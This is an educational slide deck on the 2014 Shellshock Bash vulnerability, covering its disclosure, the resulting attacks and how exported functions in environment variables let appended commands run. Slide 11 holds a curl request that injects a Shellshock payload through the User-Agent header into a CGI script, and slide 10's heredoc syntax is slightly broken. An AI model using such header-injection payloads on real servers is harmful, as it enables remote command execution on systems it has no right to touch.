Understanding the working of Shellshock bug.

1. Shellshock
1 / 12

2. Shellshock
Discovered on Sept, 2014.
a.k.a Bashdoor
Affects Bash
Causes bash to unintentionally execute any shell command.
National Institute of Standards & Technology warned vulnerability was 10/10 interms
of serverity, impact & exploitability.
2 / 12

3. The Shock!
On 12th Sept. 2014, Bash maintainer Mr. Chet Ramey is notified of the Bug by
Stephane Chazelas, an open-source enthusiast.
Within hours Chazelas submits a patch fixing the bug.
Precautions taken before public announcement.
Public announcement on 24th Sept. 2014
On 27th Sept. 2014, Michael Zalewski from Google discovers other bash vulnerabilites
and help fix them.
3 / 12

4. "Bash"ing!
Kaspersky Labs detected various DDOS attacks.
Security firm Incapsula noted 17,400 attacks on more than 1,800 web domains.
CloudFare tracking 1.5 million attacks per day.
DDOS attacks on Akamai Technologies
Scanning of systems in U.S Dept. of Defense
4 / 12

5. Bash environment
env command
$ var=hello
$ env
$ bash
var variable is not passed to the new bash instance.
export command allows passing variable to the spawned child process.
5 / 12

6. Bash function
$ foo () { echo "Hello World!"; }
$ foo
Hello World!
Bash allows passing functions as an environment variable.
export -f allows passing functions to the spawned child process.
Bash initializes foo as function after parsing the special variable foo.
6 / 12

7. Alternate way to export a function
Bash function can be exported as a variable
$ foo='() { echo "Hello World!"; }'
$ export foo
$ env
...
...
foo=() { echo "Hello World!"; }
$ bash
$ foo
Hello World!
7 / 12

8. The Bug!
$ bug='() { echo "Hello World!"; }; echo "This is a Bug!"'
$ export bug
$ bash
This is a Bug!
A command concatenated after the function definition is executed during bash
initialization!
8 / 12

9. An example: CGI-based web server
9 / 12

10. An example: CGI-based web server
CGI script
cat /usr/lib/cgi-bin/bashbug.sh <EOF
#!/bin/bash
echo “Content-type: text/html”
echo “”
echo “<h1> CGI Bash Bug Example </h1>”
EOF
10 / 12

11. An example: CGI-based web server
Malicious user request
$ curl -H ‘User-Agent: () { :;}; echo "Your system has been hacked!" > /tmp/hacker’ https://localhost/cgi-
bin/bashbug.sh
11 / 12

12. References
1. https://en.wikipedia.org/wiki/Shellshock_(software_bug)/
2. https://mustbehero.wordpress.com/2016/03/22/shellshock-bash-bug-explained-with-
examples
3. https://blog.cloudflare.com/inside-shellshock
4. http://www.nytimes.com/2014/09/26/technology/security-experts-expect-shellshock-
software-bug-to-be-significant.html
12 / 12